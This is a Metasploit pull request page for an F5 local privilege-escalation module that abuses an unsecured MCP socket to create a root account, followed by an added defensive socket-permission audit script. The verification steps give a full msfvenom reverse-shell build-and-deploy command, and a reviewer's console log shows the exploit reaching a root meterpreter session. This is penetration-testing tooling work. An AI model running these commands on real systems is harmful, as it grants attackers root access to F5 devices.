metasploit-framework

Add a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

Open rbowes-r7 opened this issue 2 years ago • 3 comments

This adds one final F5 module - a privilege escalation by creating a new user account using the MCP protocol and globally-accessible socket.

Verification

  • [ ] Start msfconsole
  • [ ] Get a non-root session - I use multi/handler + msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf [email protected]:/tmp && ssh [email protected] "sudo -u apache /tmp/testexploit.elf"
  • [ ] Run use exploit/linux/local/f5_create_user
  • [ ] Set SESSION to the ID of the previously created session
  • [ ] run, and get root

The docs/ should be up to date!

Dec 15 '22 21:12 rbowes-r7

@msjenkins-r7 test this please.

Dec 15 '22 23:12 jmartin-tech

Just wanted to say that I haven't forgotten this, but haven't had time to work on it either

Jan 20 '23 17:01 rbowes-r7

I believe I corrected all the issues, sorry about the delay!

Feb 01 '23 19:02 rbowes-r7

Thanks so much Ron! Changes work great. Awesome module 🚢

msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user.md
[-] No results from search
[-] Failed to load module: exploit/linux/local/f5_create_user.md
msf6 exploit(multi/handler) > use modules/exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/f5_create_user) > set session 1
session => 1
msf6 exploit(linux/local/f5_create_user) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/local/f5_create_user) > set lport 4445
lport => 4445
msf6 exploit(linux/local/f5_create_user) > run

[*] Started reverse TCP handler on 192.168.123.1:4445
[*] Will attempt to create user DMi6W0t1 / ZvGNep2BFL23, then change password to 6gsAldAIMSHc when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (24380 bytes) to 192.168.123.216
[*] Meterpreter session 2 opened (192.168.123.1:4445 -> 192.168.123.216:53188) at 2023-02-02 14:01:19 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >

Feb 02 '23 19:02 jheysel-r7

Release Notes

This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account

Feb 02 '23 20:02 jheysel-r7
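
The issue description attributes the escalation to a globally accessible MCP socket. As an added example (not part of this PR or of the Metasploit module), here is a defender-side audit that lists Unix domain sockets any local user can connect to. The scan root and the sample tree are constructed for illustration, since the socket's real location is not given on this page.

```python
import os
import socket
import stat
import tempfile


def world_connectable_sockets(root):
    """Return (path, mode, owner uid) for Unix sockets under root open to any local user."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Other users cannot traverse a directory without o+x, so prune it.
        if not os.lstat(dirpath).st_mode & stat.S_IXOTH:
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # entry vanished between listing and stat
            # On Linux, connect() requires write permission on the socket file.
            if stat.S_ISSOCK(st.st_mode) and st.st_mode & stat.S_IWOTH:
                findings.append((path, stat.filemode(st.st_mode), st.st_uid))
    return sorted(findings)


def make_socket(path, mode):
    """Create a bound Unix socket file with the given permission bits."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    s.close()  # the filesystem entry stays until it is unlinked
    os.chmod(path, mode)


def demo_constructed_tree():
    """Constructed sample tree: one open socket, one private, one behind a 0700 dir."""
    with tempfile.TemporaryDirectory() as tmp:
        os.chmod(tmp, 0o755)
        locked = os.path.join(tmp, "locked")
        os.mkdir(locked)
        make_socket(os.path.join(tmp, "open.sock"), 0o666)
        make_socket(os.path.join(tmp, "private.sock"), 0o600)
        make_socket(os.path.join(locked, "hidden.sock"), 0o666)
        os.chmod(locked, 0o700)
        return [(os.path.basename(p), m) for p, m, _ in world_connectable_sockets(tmp)]


if __name__ == "__main__":
    for name, mode in demo_constructed_tree():
        print(f"world-connectable socket: {name} {mode}")
```

The check reads mode bits only: permissions on directories above the scan root and any POSIX ACLs are not evaluated.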